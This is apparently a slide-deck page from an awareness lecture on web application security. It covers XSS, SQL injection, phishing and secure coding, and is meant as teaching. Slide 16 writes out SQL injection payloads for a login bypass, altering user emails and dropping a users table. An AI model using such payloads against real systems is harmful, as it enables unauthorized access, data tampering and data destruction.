web application security presentation

Web Application Security and Awareness

Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web. Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors. The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others. Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered. The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles. Read less

Recommended

More related content, what's hot, what's hot ( 20 ), viewers also liked, viewers also liked ( 20 ), similar to web application security and awareness, similar to web application security and awareness ( 20 ), more from abdul rahman sherzad, more from abdul rahman sherzad ( 20 ), recently uploaded, recently uploaded ( 20 ).

• 1. Web Application Security and Awareness Abdul Rahman, Sherzad Lecturer at Computer Science Faculty of Herat University, Afghanistan, and Ph.D. Student at Technical University of Berlin, Germany December 19, 2016 12th IT Conference for Higher Education in Afghanistan January 05, 2017 Hariwa Institute of Higher Education, Herat, Afghanistan
• 2. 2 Major problems were only caused by a collection of smaller factors, and only a reverse similar behavior is needed to resolve the given situation (Sherzad).
• 3. Goal and Objectives Build security awareness for web applications Get to know attack methods Learn ways to discover security vulnerabilities Learn the basics of secure web development 3
• 4. 4 Web Application Security Websites Web Applications Web Services
• 5. 5 Intentions Malicious Damage Financial Gain Blackmail Further Attacks Political Competitor Commercial Personal Grievance Discover Vulnerabilities Show Skills [1]
• 6. Security Threats ■ The majority of web application attacks occur through – Cross Site Scripting (XSS) – SQL Injection ■ The majority of web application vulnerabilities arise from – Weak coding, – Failure to properly validate input, – Failure to sanitize output. 6[2] [3] [4]
• 7. 2010 Web Applications Weakness 7[2][3][4]
• 8. User Input • Attacker can easily change any part of the HTTP request before submitting – Cookies – Form fields – Hidden fields – URL – Headers • The ultimate solution: Input must be validated on the SERVER! – Not just on the CLIENT! 8[5]
• 9. Client-side - Demo Link ■ Client-side Validation (Can be disabled by client) – HTML5 – JavaScript ■ Input Fields (Can be Modified by client) – Hidden Fields – Dropdown ■ Cookies (Can be Changed by client) 9
• 10. Phishing – Demo Link ■ Hackers use E-MAIL / Instant Message to fish or steal user's personal and financial information – User ID / Password – Credit Card Number – PIN ■ In a typical phishing attack a user will receive an e-mail message impersonated to be sent from a bank or other e-commerce enterprise. ■ 1% - 20% users respond to such attacks. ■ In Afghanistan it is very common and practical!!! 10[6] [7]
• 11. Phishing Ultimate Solutions ■ Policy guidelines ■ Training the end users ■ User awareness – Carefully check the suspicious links! – Do not click the E-MAIL asking sensitive data! – Do not Trust TinyURL links! – Do not Enter CREDIT CARD or Sensitive Data if the website doesn't start with https:// 11[6] [7]
• 12. Cross-site Scripting (XSS) ■ XSS, a security exploit in which the attacker inserts malicious client-side code into webpages. ■ It has been around since the 1990s. ■ Most major websites like Google, Yahoo and Facebook have all been affected by cross-site scripting flaws at some point. ■ Attacks exploiting XSS vulnerabilities can steal data, take control of a user's session, run malicious code, or be used as part of a phishing scam. – Reflected - Demo Link – Persistent – Basic Demo Link || Steal Cookie Demo Link 12[8] [9] [10]
• 13. Preventing XSS Attacks ■ Filtering ■ Input Validation / Output Sanitization ■ Select a safer browser ■ Use a virtual machine for suspicious links ■ Pay more attention to shortened URLs ■ Use plugins for better security (like NoScript). 13[8] [9] [10]
• 14. SQL Injection ■ SQL Injection is a technique where malicious users can inject SQL commands into an SQL statement through – URLs – Input Parameters – Others e.g. Cookie, HTTP Headers ■ SQL injection is a very old approach but it is still popular among attackers. 14[11] [12]
• 15. Possible Threats ■ Unauthorized access to application – User login without knowing the login nor the password ■ Access to whole database / databases on the server – Attacker can delete, modify or even worse, steal the data ■ Read / write files on server's file system ■ Code execution 15[11] [12]
• 16. SQL Injection - Demo Link ■ Login without knowing the username and the password – anything' OR TRUE; -- ■ Modify and steal the data – anything' OR 1; UPDATE users SET email = '[email protected]' WHERE email = '[email protected]';-- ■ Delete data and even drop the tables – anything' OR 1; DROP TABLE users; -- 16
• 17. 17 Mitigate Risk Always validate input Escape user input Least privilege Use prepared statements Code reviews Salt & hash passwords [13] [14]
• 18. Conclusion - Core Security Principles ■ Use least privilege ■ Do not trust user input ■ Apply defense in depth ■ Fail securely and friendly ■ Turn off un-needed services ■ Keep systems patched ■ Watch for logic holes ■ Hide sensitive information – Encryption – Access controls 18[15] [16]
• 19. 19 Works Cited 1 The Australian High Tech Crime Center. (2005). Hacking Motives. Australia: Australian High Tech Crime Center. 2 The Ocenzic. (2014). Application Vulnerability Trends Report. Ocenzic. 3 The Open Web Application Security Project. (2013, June 12). OWASP Top Ten Project. Retrieved from OWASP: https://www.owasp.org/index.php/Top10#OWASP_Top_10_for_2013 4 The Web Application Security Consortium. (2011). Web-Hacking-Incident-Database. Retrieved from WASP: http://projects.webappsec.org/w/page/13246995/Web- Hacking-Incident-Database 5 The Open Web Application Security Project. (2010, April 22). Unvalidated Input. Retrieved from OWASP: https://www.owasp.org/index.php/Unvalidated_Input 6 The Open Web Application Security Project. (2009, April 14). Phishing. Retrieved from OWASP: https://www.owasp.org/index.php/Phishing 7 Steinberg, J. (2014, August 25). Why You Are At Risk Of Phishing Attacks. Retrieved from Forbes: http://www.forbes.com/sites/josephsteinberg/2014/08/25/why-you- are-at-risk-of-phishing-attacks-and-why-jp-morgan-chase-customers-were-targeted-this-week/ 8 The Open Web Application Security Project. (2014, April 22). Cross-site Scripting (XSS). Retrieved from OWASP: https://www.owasp.org/index.php/Cross- site_Scripting_(XSS) 9 Abela, R. (2013, June 5). The Dangerous Complexity of Web Application Security. Retrieved from NetSparker: https://www.netsparker.com/blog/web-security/dangerous- complexity-of-web-application-security/ 10 Abela, R. (2013, May 22). Web Application Security Misconception; Are All Vulnerabilities Equally Dangerous? Retrieved from Netsparker: https://www.netsparker.com/blog/web-security/web-application-security-misconceptions-vulnerabilities/ 11 The Open Web Application Security Project. (2014, August 14). SQL Injection. Retrieved from OWASP: https://www.owasp.org/index.php/SQL_Injection 12 Abela, R. (2013, May 28). South African Police Web Application for Whistleblowers Hacked via SQL Injection. Retrieved from Netsparker: https://www.netsparker.com/blog/news/south-african-police-whistleblowers-hacked-sql-injection/ 13 The Open Web Application Security Project. (2014, June 7). SQL Injection Prevention Cheat Sheet. Retrieved from OWASP: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet 14 Litwin, P. (2004, September). Stop SQL Injection Attacks Before They Stop You. Retrieved from MSDN: https://msdn.microsoft.com/en-us/magazine/cc163917.aspx 15 Meier, J. D., Mackman, A., Dunner, M., Vasireddy, S., Escamilla, R., & Murukan, A. (2003). Improving Web Application Security: Threats and Countermeasures. Microsoft. 16 Bollefer, T., Chander, G., Johansson, J., Kass, M., & Olson, E. (2002). Building and Configuring More Secure Web Sites. Microsoft.